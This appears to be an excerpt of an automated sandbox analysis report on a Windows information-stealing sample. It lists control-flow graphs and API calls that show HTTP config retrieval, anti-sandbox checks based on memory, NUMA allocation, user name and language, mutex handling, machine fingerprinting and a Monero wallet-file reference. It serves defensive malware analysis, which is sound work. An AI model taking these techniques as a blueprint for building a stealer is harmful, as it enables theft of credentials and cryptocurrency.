                  control_flow_graph 1033 b06280-b0630b call b1a7a0 call b047b0 call b1a740 InternetOpenA StrCmpCA 1040 b06314-b06318 1033->1040 1041 b0630d 1033->1041 1042 b06509-b06525 call b1a7a0 call b1a800 * 2 1040->1042 1043 b0631e-b06342 InternetConnectA 1040->1043 1041->1040 1062 b06528-b0652d 1042->1062 1045 b06348-b0634c 1043->1045 1046 b064ff-b06503 InternetCloseHandle 1043->1046 1048 b0635a 1045->1048 1049 b0634e-b06358 1045->1049 1046->1042 1051 b06364-b06392 HttpOpenRequestA 1048->1051 1049->1051 1053 b064f5-b064f9 InternetCloseHandle 1051->1053 1054 b06398-b0639c 1051->1054 1053->1046 1056 b063c5-b06405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 b0639e-b063bf InternetSetOptionA 1054->1057 1058 b06407-b06427 call b1a740 call b1a800 * 2 1056->1058 1059 b0642c-b0644b call b18940 1056->1059 1057->1056 1058->1062 1067 b064c9-b064e9 call b1a740 call b1a800 * 2 1059->1067 1068 b0644d-b06454 1059->1068 1067->1062 1071 b06456-b06480 InternetReadFile 1068->1071 1072 b064c7-b064ef InternetCloseHandle 1068->1072 1076 b06482-b06489 1071->1076 1077 b0648b 1071->1077 1072->1053 1076->1077 1080 b0648d-b064c5 call b1a9b0 call b1a8a0 call b1a800 1076->1080 1077->1072 1080->1071
                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04839
                    • Part of subcall function 00B047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04849
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • InternetOpenA.WININET(00B20DFE,00000001,00000000,00000000,00000000), ref: 00B062E1
                  • StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B06303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B06335
                  • HttpOpenRequestA.WININET(00000000,GET,?,011FDD60,00000000,00000000,00400100,00000000), ref: 00B06385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B063BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B063D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B063FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B0646D
                  • InternetCloseHandle.WININET(00000000), ref: 00B064EF
                  • InternetCloseHandle.WININET(00000000), ref: 00B064F9
                  • InternetCloseHandle.WININET(00000000), ref: 00B06503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 20a9763d8c933cb83f1de115ae25f439c531fe716da7e23d3a82b59b9ac23ba1
                  • Instruction ID: d75327ac7681e7151592fc51255ad8071965ebca71fdc33afb02ed217ee3afb3
                  • Opcode Fuzzy Hash: 20a9763d8c933cb83f1de115ae25f439c531fe716da7e23d3a82b59b9ac23ba1
                  • Instruction Fuzzy Hash: 9D716F75A40318ABDB24DFA4DC49BEE7BB8FB44700F508198F109AB2D0DBB46A85CF51

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1090 b15510-b15577 call b15ad0 call b1a820 * 3 call b1a740 * 4 1106 b1557c-b15583 1090->1106 1107 b15585-b155b6 call b1a820 call b1a7a0 call b01590 call b151f0 1106->1107 1108 b155d7-b1564c call b1a740 * 2 call b01590 call b152c0 call b1a8a0 call b1a800 call b1aad0 StrCmpCA 1106->1108 1124 b155bb-b155d2 call b1a8a0 call b1a800 1107->1124 1134 b15693-b156a9 call b1aad0 StrCmpCA 1108->1134 1138 b1564e-b1568e call b1a7a0 call b01590 call b151f0 call b1a8a0 call b1a800 1108->1138 1124->1134 1139 b157dc-b15844 call b1a8a0 call b1a820 * 2 call b01670 call b1a800 * 4 call b16560 call b01550 1134->1139 1140 b156af-b156b6 1134->1140 1138->1134 1270 b15ac3-b15ac6 1139->1270 1143 b157da-b1585f call b1aad0 StrCmpCA 1140->1143 1144 b156bc-b156c3 1140->1144 1163 b15991-b159f9 call b1a8a0 call b1a820 * 2 call b01670 call b1a800 * 4 call b16560 call b01550 1143->1163 1164 b15865-b1586c 1143->1164 1148 b156c5-b15719 call b1a820 call b1a7a0 call b01590 call b151f0 call b1a8a0 call b1a800 1144->1148 1149 b1571e-b15793 call b1a740 * 2 call b01590 call b152c0 call b1a8a0 call b1a800 call b1aad0 StrCmpCA 1144->1149 1148->1143 1149->1143 1249 b15795-b157d5 call b1a7a0 call b01590 call b151f0 call b1a8a0 call b1a800 1149->1249 1163->1270 1170 b15872-b15879 1164->1170 1171 b1598f-b15a14 call b1aad0 StrCmpCA 1164->1171 1179 b158d3-b15948 call b1a740 * 2 call b01590 call b152c0 call b1a8a0 call b1a800 call b1aad0 StrCmpCA 1170->1179 1180 b1587b-b158ce call b1a820 call b1a7a0 call b01590 call b151f0 call b1a8a0 call b1a800 1170->1180 1200 b15a16-b15a21 Sleep 1171->1200 1201 b15a28-b15a91 call b1a8a0 call b1a820 * 2 call b01670 call b1a800 * 4 call b16560 call b01550 1171->1201 1179->1171 1275 b1594a-b1598a call b1a7a0 call b01590 call b151f0 call b1a8a0 call b1a800 1179->1275 1180->1171 1200->1106 1201->1270 1249->1143 1275->1171
                  APIs
                    • Part of subcall function 00B1A820: lstrlen.KERNEL32(00B04F05,?,?,00B04F05,00B20DDE), ref: 00B1A82B
                    • Part of subcall function 00B1A820: lstrcpy.KERNEL32(00B20DDE,00000000), ref: 00B1A885
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B15644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B156A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B15857
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B15228
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B15318
                    • Part of subcall function 00B152C0: lstrlen.KERNEL32(00000000), ref: 00B1532F
                    • Part of subcall function 00B152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00B15364
                    • Part of subcall function 00B152C0: lstrlen.KERNEL32(00000000), ref: 00B15383
                    • Part of subcall function 00B152C0: lstrlen.KERNEL32(00000000), ref: 00B153AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B1578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B15940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B15A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00B15A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: e145fed494c38ab1ca6124a4a57ca77c223de945a7c8ad2b8c4fc2b5a81b3648
                  • Instruction ID: f3514a7f82e24bdf7b5c46a32c3ee4c2d96d43cf07396005a42bc9c9ee044cd7
                  • Opcode Fuzzy Hash: e145fed494c38ab1ca6124a4a57ca77c223de945a7c8ad2b8c4fc2b5a81b3648
                  • Instruction Fuzzy Hash: 56E153719112049BCB14FBA4DD92DED73BCAF54310FD085A8B406A6191EF347F8ACBA2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1301 b117a0-b117cd call b1aad0 StrCmpCA 1304 b117d7-b117f1 call b1aad0 1301->1304 1305 b117cf-b117d1 ExitProcess 1301->1305 1309 b117f4-b117f8 1304->1309 1310 b119c2-b119cd call b1a800 1309->1310 1311 b117fe-b11811 1309->1311 1313 b11817-b1181a 1311->1313 1314 b1199e-b119bd 1311->1314 1316 b118f1-b11902 StrCmpCA 1313->1316 1317 b11951-b11962 StrCmpCA 1313->1317 1318 b11970-b11981 StrCmpCA 1313->1318 1319 b11913-b11924 StrCmpCA 1313->1319 1320 b11932-b11943 StrCmpCA 1313->1320 1321 b11835-b11844 call b1a820 1313->1321 1322 b1185d-b1186e StrCmpCA 1313->1322 1323 b1187f-b11890 StrCmpCA 1313->1323 1324 b11821-b11830 call b1a820 1313->1324 1325 b11849-b11858 call b1a820 1313->1325 1326 b118ad-b118be StrCmpCA 1313->1326 1327 b118cf-b118e0 StrCmpCA 1313->1327 1328 b1198f-b11999 call b1a820 1313->1328 1314->1309 1348 b11904-b11907 1316->1348 1349 b1190e 1316->1349 1331 b11964-b11967 1317->1331 1332 b1196e 1317->1332 1334 b11983-b11986 1318->1334 1335 b1198d 1318->1335 1350 b11930 1319->1350 1351 b11926-b11929 1319->1351 1329 b11945-b11948 1320->1329 1330 b1194f 1320->1330 1321->1314 1340 b11870-b11873 1322->1340 1341 b1187a 1322->1341 1342 b11892-b1189c 1323->1342 1343 b1189e-b118a1 1323->1343 1324->1314 1325->1314 1344 b118c0-b118c3 1326->1344 1345 b118ca 1326->1345 1346 b118e2-b118e5 1327->1346 1347 b118ec 1327->1347 1328->1314 1329->1330 1330->1314 1331->1332 1332->1314 1334->1335 1335->1314 1340->1341 1341->1314 1355 b118a8 1342->1355 1343->1355 1344->1345 1345->1314 1346->1347 1347->1314 1348->1349 1349->1314 1350->1314 1351->1350 1355->1314
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00B117C5
                  • ExitProcess.KERNEL32 ref: 00B117D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: ba284369763f5c8e7f170a0e9f5834a4d38f0a9a7f8153219f0de7d4e255e722
                  • Instruction ID: 2c2bd892d5b6fc3055c215ca5292b5b0e6ba461ed0be6712b74c705427aa6054
                  • Opcode Fuzzy Hash: ba284369763f5c8e7f170a0e9f5834a4d38f0a9a7f8153219f0de7d4e255e722
                  • Instruction Fuzzy Hash: 6B516CB4A10209EBCB04DFA8D994AFE77F5FF44344F508898E916A7351D770E982CB62

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1356 b17500-b1754a GetWindowsDirectoryA 1357 b17553-b175c7 GetVolumeInformationA call b18d00 * 3 1356->1357 1358 b1754c 1356->1358 1365 b175d8-b175df 1357->1365 1358->1357 1366 b175e1-b175fa call b18d00 1365->1366 1367 b175fc-b17617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 b17619-b17626 call b1a740 1367->1369 1370 b17628-b17658 wsprintfA call b1a740 1367->1370 1377 b1767e-b1768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B17542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B1757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B1760A
                  • wsprintfA.USER32 ref: 00B17640
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 800687fbc9d0446a5cdf75ece57a1115e08710028bf2737f1b8174c257e028bd
                  • Instruction ID: 7fb4c7de2a6060303b86d462446f5d802ded93d90a0a5a5ebb08b74a670f403d
                  • Opcode Fuzzy Hash: 800687fbc9d0446a5cdf75ece57a1115e08710028bf2737f1b8174c257e028bd
                  • Instruction Fuzzy Hash: ED4182B5D44358ABDB10DF98DC85BEEBBB8EF18700F100199F509A7280DB746A84CBA5

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F06C0), ref: 00B198A1
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F0708), ref: 00B198BA
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F0720), ref: 00B198D2
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F07F8), ref: 00B198EA
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F0558), ref: 00B19903
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F8950), ref: 00B1991B
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011E6580), ref: 00B19933
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011E65A0), ref: 00B1994C
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F0570), ref: 00B19964
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F0588), ref: 00B1997C
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F05A0), ref: 00B19995
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F05B8), ref: 00B199AD
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011E6500), ref: 00B199C5
                    • Part of subcall function 00B19860: GetProcAddress.KERNEL32(75900000,011F05D0), ref: 00B199DE
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B011D0: ExitProcess.KERNEL32 ref: 00B01211
                    • Part of subcall function 00B01160: GetSystemInfo.KERNEL32(?), ref: 00B0116A
                    • Part of subcall function 00B01160: ExitProcess.KERNEL32 ref: 00B0117E
                    • Part of subcall function 00B01110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B0112B
                    • Part of subcall function 00B01110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00B01132
                    • Part of subcall function 00B01110: ExitProcess.KERNEL32 ref: 00B01143
                    • Part of subcall function 00B01220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B0123E
                    • Part of subcall function 00B01220: __aulldiv.LIBCMT ref: 00B01258
                    • Part of subcall function 00B01220: __aulldiv.LIBCMT ref: 00B01266
                    • Part of subcall function 00B01220: ExitProcess.KERNEL32 ref: 00B01294
                    • Part of subcall function 00B16770: GetUserDefaultLangID.KERNEL32 ref: 00B16774
                    • Part of subcall function 00B01190: ExitProcess.KERNEL32 ref: 00B011C6
                    • Part of subcall function 00B17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B011B7), ref: 00B17880
                    • Part of subcall function 00B17850: RtlAllocateHeap.NTDLL(00000000), ref: 00B17887
                    • Part of subcall function 00B17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B1789F
                    • Part of subcall function 00B178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17910
                    • Part of subcall function 00B178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B17917
                    • Part of subcall function 00B178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B1792F
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011F8910,?,00B2110C,?,00000000,?,00B21110,?,00000000,00B20AEF), ref: 00B16ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B16AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00B16AF9
                  • Sleep.KERNEL32(00001770), ref: 00B16B04
                  • CloseHandle.KERNEL32(?,00000000,?,011F8910,?,00B2110C,?,00000000,?,00B21110,?,00000000,00B20AEF), ref: 00B16B1A
                  • ExitProcess.KERNEL32 ref: 00B16B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: b347cc711a87abe8383581933181c2b46d41547f5d5cdfe6c73abb95989531d7
                  • Instruction ID: 956be6ae0f48c9bfa05f283d71591c456d567ef4fe0235bd8b5aaa182253750c
                  • Opcode Fuzzy Hash: b347cc711a87abe8383581933181c2b46d41547f5d5cdfe6c73abb95989531d7
                  • Instruction Fuzzy Hash: 74311C71941208ABDB08FBF4DC56BEE77F8AF14350F904598F202B21D2DF706986C6A2

                  Control-flow Graph

                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B0123E
                  • __aulldiv.LIBCMT ref: 00B01258
                  • __aulldiv.LIBCMT ref: 00B01266
                  • ExitProcess.KERNEL32 ref: 00B01294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 527a7fd67586e2beea23ec072c93f1f871e24524e94b119414a34a8274fcebca
                  • Instruction ID: dc1e4d4b1b67fc7c6d8632edf6274eb0f08e8b659019204e18008ffa87f7b704
                  • Opcode Fuzzy Hash: 527a7fd67586e2beea23ec072c93f1f871e24524e94b119414a34a8274fcebca
                  • Instruction Fuzzy Hash: CB01FFB0984308BBEB14DFD8CC49B9DBBB8AB14705F608484E705B62C0DA7455458B99

                  Control-flow Graph

                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011F8910,?,00B2110C,?,00000000,?,00B21110,?,00000000,00B20AEF), ref: 00B16ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B16AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00B16AF9
                  • Sleep.KERNEL32(00001770), ref: 00B16B04
                  • CloseHandle.KERNEL32(?,00000000,?,011F8910,?,00B2110C,?,00000000,?,00B21110,?,00000000,00B20AEF), ref: 00B16B1A
                  • ExitProcess.KERNEL32 ref: 00B16B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 9e8e9289770113ca69d6fd4f4597a6d3d7a89411353a6ec93307012f7e781c43
                  • Instruction ID: 4b0a36404c9b855efe8ec9b9da2798c88726cc01c76dd2cfe6db640e4598589e
                  • Opcode Fuzzy Hash: 9e8e9289770113ca69d6fd4f4597a6d3d7a89411353a6ec93307012f7e781c43
                  • Instruction Fuzzy Hash: 36F05E34A84309EBE710AFA0DC86BFE7BB4EF04741F904594F502E12C1CBB06580D6A6

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 9a3c547c66e9471d936972894a9f6459327980a3876ef78ea50a218482e522fc
                  • Instruction ID: 4c1a5515b8dd9f7fc2465078eaaf816421fb1a7f3d6f6c583957c017c390035f
                  • Opcode Fuzzy Hash: 9a3c547c66e9471d936972894a9f6459327980a3876ef78ea50a218482e522fc
                  • Instruction Fuzzy Hash: 47215EB1D01209ABDF14DFA4EC45ADE7B74FF05320F008625F915A72D1EB706A09CB91

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B06280: InternetOpenA.WININET(00B20DFE,00000001,00000000,00000000,00000000), ref: 00B062E1
                    • Part of subcall function 00B06280: StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B06303
                    • Part of subcall function 00B06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B06335
                    • Part of subcall function 00B06280: HttpOpenRequestA.WININET(00000000,GET,?,011FDD60,00000000,00000000,00400100,00000000), ref: 00B06385
                    • Part of subcall function 00B06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B063BF
                    • Part of subcall function 00B06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B063D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B15228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 43594235e0e5beab317d6aa785167c543929aea8bb2c6427bece5835fa07774a
                  • Instruction ID: c80297d5ebc907aa9d6e9d3512a9a65e67b9b61bd0b7d88b2dfc336ac984f934
                  • Opcode Fuzzy Hash: 43594235e0e5beab317d6aa785167c543929aea8bb2c6427bece5835fa07774a
                  • Instruction Fuzzy Hash: C5112E30911108ABCB14FF64DD92AED77B8AF50310FC04598F80A5A192EF30BB86C691
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B0112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00B01132
                  • ExitProcess.KERNEL32 ref: 00B01143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 8c5f3cc4038c6b2858448f6c2308d8ea72410d9d516294c2107ecd1ceeb34959
                  • Instruction ID: 7896279bbe5cf29ed0f8a6e322e405433d33d1c6d83cb5f85515e3a526d6bef1
                  • Opcode Fuzzy Hash: 8c5f3cc4038c6b2858448f6c2308d8ea72410d9d516294c2107ecd1ceeb34959
                  • Instruction Fuzzy Hash: 0DE08674985308FBE7146FA89C0AB097AB8EB05B01F100084F708B62C0D6B4260096A9
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00B010B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00B010F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 165106bf85ca35ccc84f075e0afa3d3a6a0538cd3a6084009029bfbf55b1af31
                  • Instruction ID: 389bbd7e55fcd064bcc10f5d776f7eba6f60f63aacf5c7e019f3d92c8b65e0d1
                  • Opcode Fuzzy Hash: 165106bf85ca35ccc84f075e0afa3d3a6a0538cd3a6084009029bfbf55b1af31
                  • Instruction Fuzzy Hash: 0BF0E271681308BBE7149BA8AC49FAAB7E8E705B55F301888F544E3280D5719E40CAA0
                  APIs
                    • Part of subcall function 00B178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17910
                    • Part of subcall function 00B178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B17917
                    • Part of subcall function 00B178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B1792F
                    • Part of subcall function 00B17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B011B7), ref: 00B17880
                    • Part of subcall function 00B17850: RtlAllocateHeap.NTDLL(00000000), ref: 00B17887
                    • Part of subcall function 00B17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B1789F
                  • ExitProcess.KERNEL32 ref: 00B011C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: 8ed6045266b034db104691042f3dcaef82cd2bb587e498b1972816507b60bbb9
                  • Instruction ID: 2238cdca4883a8a0330275a2a9f449f3d12fbaec18ef2aaba660f3d988218508
                  • Opcode Fuzzy Hash: 8ed6045266b034db104691042f3dcaef82cd2bb587e498b1972816507b60bbb9
                  • Instruction Fuzzy Hash: 06E012B999430153DA1477BAAC0AB6A37DCAB15385F4408A4FA09E3242FE25E94185B6
                  APIs
                  • wsprintfA.USER32 ref: 00B138CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 00B138E3
                  • lstrcat.KERNEL32(?,?), ref: 00B13935
                  • StrCmpCA.SHLWAPI(?,00B20F70), ref: 00B13947
                  • StrCmpCA.SHLWAPI(?,00B20F74), ref: 00B1395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B13C67
                  • FindClose.KERNEL32(000000FF), ref: 00B13C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
